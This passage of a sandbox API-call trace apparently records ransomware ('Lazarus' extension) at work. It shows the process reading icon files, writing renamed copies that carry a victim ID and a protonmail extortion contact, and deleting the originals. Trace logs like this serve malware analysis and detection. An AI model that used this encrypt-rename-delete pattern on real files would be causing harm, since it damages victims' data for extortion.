dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.165] CloseHandle (hObject=0x410) returned 1 [0076.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.167] CloseHandle (hObject=0x42c) returned 1 [0076.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.167] AreFileApisANSI () returned 1 [0076.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67660 [0076.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0076.168] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.169] GetFileType (hFile=0x42c) returned 0x1 [0076.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0076.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.169] GetLastError () returned 0xb7 [0076.169] SetLastError (dwErrCode=0xb7) [0076.169] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.170] CloseHandle (hObject=0x42c) returned 1 [0076.170] AreFileApisANSI () returned 1 [0076.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0076.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0076.170] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico")) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.172] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.172] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0076.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0076.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0076.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0076.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0076.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.173] AreFileApisANSI () returned 1 [0076.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico", lpUsedDefaultChar=0x0) returned 40 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0076.173] AreFileApisANSI () returned 1 [0076.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0076.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6cdf0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.173] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.173] GetFileType (hFile=0x42c) returned 0x1 [0076.174] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0076.174] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.174] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.174] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.174] CloseHandle (hObject=0x42c) returned 1 [0076.175] AreFileApisANSI () returned 1 [0076.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0076.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d058, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.175] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.175] GetFileType (hFile=0x42c) returned 0x1 [0076.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0076.175] CloseHandle (hObject=0x42c) returned 1 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0076.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.176] AreFileApisANSI () returned 1 [0076.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0076.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.176] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796)) returned 1 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0076.177] AreFileApisANSI () returned 1 [0076.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0076.177] GetLastError () returned 0x0 [0076.177] SetLastError (dwErrCode=0x0) [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0076.177] GetLastError () returned 0x0 [0076.177] SetLastError (dwErrCode=0x0) [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69170 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0076.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0076.177] AreFileApisANSI () returned 1 [0076.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0076.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x73938 [0076.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x73938, cchWideChar=102 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0076.178] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.178] GetFileType (hFile=0x42c) returned 0x1 [0076.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73938 | out: hHeap=0x20000) returned 1 [0076.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0076.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.178] AreFileApisANSI () returned 1 [0076.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.178] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0076.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d2c0, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0076.178] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.179] GetFileType (hFile=0x410) returned 0x1 [0076.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.179] GetLastError () returned 0x0 [0076.179] SetLastError (dwErrCode=0x0) [0076.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.179] GetLastError () returned 0x0 [0076.179] SetLastError (dwErrCode=0x0) [0076.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.179] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0076.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0076.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.181] GetLastError () returned 0x0 [0076.181] SetLastError (dwErrCode=0x0) [0076.181] GetLastError () returned 0x0 [0076.181] SetLastError (dwErrCode=0x0) [0076.181] GetLastError () returned 0x0 [0076.181] SetLastError (dwErrCode=0x0) [0076.181] GetLastError () returned 0x0 [0076.182] SetLastError (dwErrCode=0x0) [0076.182] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0076.182] WriteFile (in: hFile=0x42c, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.183] GetLastError () returned 0x0 [0076.183] SetLastError (dwErrCode=0x0) [0076.183] GetLastError () returned 0x0 [0076.183] SetLastError (dwErrCode=0x0) [0076.183] GetLastError () returned 0x0 [0076.183] SetLastError (dwErrCode=0x0) [0076.183] GetLastError () returned 0x0 [0076.183] SetLastError (dwErrCode=0x0) [0076.183] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x796, lpOverlapped=0x0) returned 1 [0076.183] WriteFile (in: hFile=0x42c, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0076.184] GetLastError () returned 0x0 [0076.184] SetLastError (dwErrCode=0x0) [0076.184] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.184] GetLastError () returned 0x0 [0076.184] SetLastError (dwErrCode=0x0) [0076.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfa0 [0076.184] 